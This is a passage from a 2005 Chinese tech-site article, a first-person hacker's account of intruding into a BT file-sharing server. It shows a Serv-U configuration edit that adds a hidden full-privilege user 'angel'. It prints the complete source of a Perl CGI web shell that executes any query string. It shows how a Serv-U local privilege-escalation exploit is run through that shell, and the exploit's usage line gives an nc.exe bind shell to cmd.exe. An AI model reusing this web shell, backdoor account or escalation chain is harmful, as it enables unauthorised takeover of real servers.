通行证: 用户 密码
http://www.pconline.cn/
汽车网 | 游戏网 | 时尚女性
北京 上海 广州 深圳 香港 广西
重庆 山东 江苏 辽宁 福建 成都
首 页 | 今日报价 | 产业资讯 | 数码世界 | 硬件资讯 | 软件资讯 | 下 载 | 游 戏 |
论 坛 | 产 品 库 | 渠道商情 | 招聘培训 | 二    手 | 评 测 室 | 导 购 | 社 区 |
摄影
部落
手 机
数码相机
随身听
 DIY配件
笔记本
 台式机
摄像机
精品廊
-
您现在的位置: 软件资讯 > 软件应用 > 信息安全 > 黑客攻防战 免费新闻代码RSS新闻聚合
  你BT我更BT!记一次入侵BT服务器 出处:太平洋电脑网
[ 2005-10-14 10:20:40 ] 作者:佚名 责任编辑:linjixiong




User281=angel|1|0


  然后加上


[USER=angel|1]
Password=ng98F85379EA68DBF97BAADCA99B69B805
HomeDir=D:\websites
RelPaths=1
TimeOut=600
Maintenance=System
Access1=D:\websites|RWAMELCDP
SKEYValues=




  添加一个 angel,密码为 111111 的用户,具有最高权限执行,然后我们就可以 ftp 上去 quote site exec xxxxxxxx 了,嘻嘻偷笑中……

  不过残酷现实再一次粉碎了我的计划,修改好文件以后提交,居然是没有修改成功,看来还是权限,权限权限整惨人啊。

  不过还是有希望的,因为刚才我们看到了系统装了黑冰,有些版本存在“ISS RealSecure/BlackICE 协议分析模块 SMB 解析堆溢出漏洞”,可以远程利用的,手头上没有编译器,没有办法编译代码。

  还有就是 Perl,这个是个很大的突破口,因为 Perl 目录一般要 erveryone 完全控制的,不管他用 isap 还是 perl.exe 一般都是可写、可执行的,马上下载 Perl 的快捷方式来看看路径,呵呵,看到了,原来 D:\user\bin 就是存放 perl 的 bin 目录下的所有文件,这么说这个目录可能可以写,也可能可以执行咯,马上传一个 su.exe(针对目前所有版本的 Serv-U 本地提升权限漏洞)上去,呵呵,传上去了,太好了,现在就是执行了,刚才我们试了 aspshell、phpshell 都不行,现在就看最后的希望了,找呀找啊,终于在我硬盘上找到一个 cgishell,很老了,文件日期是 2002 年 6 月 30 日的,代码如下:


#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "

\r\n", 13);  
open(STDERR, ">&STDOUT") || die "Can’t redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n
\r\n", 17);
close(STDERR);
close(STDOUT);
exit;



  我用过最好的 cgishell ,保存为一个 cgi 文件执行,晕……居然不支持!一阵阵郁闷袭来,2 秒钟的郁闷后,想到还有一线希望,那就是pl ,我们还没有试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir ,我的天啊!!

  显示“拒绝访问”,终于可以执行了!太兴奋了,马上提交:

http://anyhost//cmd.pl?d:\user\bin\su.exe

  返回:



Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"



来PConline劲爆论坛抢大奖!马上点击进入网络安全讨论区


[上一页] [1] [2] [3] [4] [下一页]

更多相关搜索: BT.. 服务器.. 黑客.. 入侵.. 红客..
正在加载评论,请稍候…

发给好友 我要报错 投稿给我们 加入收藏 返回顶部

本栏今日更新
相关文章
·火速!仅隔一月iTunes新版又登场
·微软企业级安全软件即将推出
·Windows平台未来将直接支持RM?
·快升级!微软10月安全补丁发布
·超便捷:MSN Msg Plus!新版惊喜试用
·用XP硬件配置文件提高启动速度
·视频教程:超级兔子入门技巧
·冰凉新世界漂亮主题

完美时尚娱乐:2004年腾讯QQ评测大观
精彩无限:MSN Shell4使用指南
亲手制作鲜花情人贺卡送给她
挑战伏明霞?企鹅跳水游戏,看你能得多少分?

新闻搜索
高级搜索
-
热点专题
·Macromedia Studio8专题
·挑战十大Flash智益游戏
·QQ辅助软件使用指南
·向"流氓软件"大声说不!
·惜别!毕业十大必唱歌曲
·搜索技巧:网罗天下的乐趣
·电脑艺术设计大师之路连载
·老歌歪唱Flash MV爆笑欣赏
更多...
Flash排行榜

·宇春:我心里只有你沒有他
·超级女声笔畅-《笔记》
·超女张含韵-《想唱就唱》
·密室逃脱游戏- 空房出逃
·爱情的宽容-《别人》
·搞笑动脑游戏-商店神偷
·惊险逃离游戏-逃离鬼屋
·雨夜恐怖古宅探秘游戏
·那些曾为你流下的眼泪
·紧急逃离-即将沉没的船

更多...
IT培训热门文章
· 月薪5万,微软最新面试题
· 微软召开黑客大会(图)
· 美军超级黑客特种部队揭密
· Linux下软件安装详解(图)
· 软考模拟软件(网络工程师)
· 2005年软件水平考试资料
· 世界编程大赛第1名写的程序
· 某变态公司的面试IQ题
更多...
PConline频道精选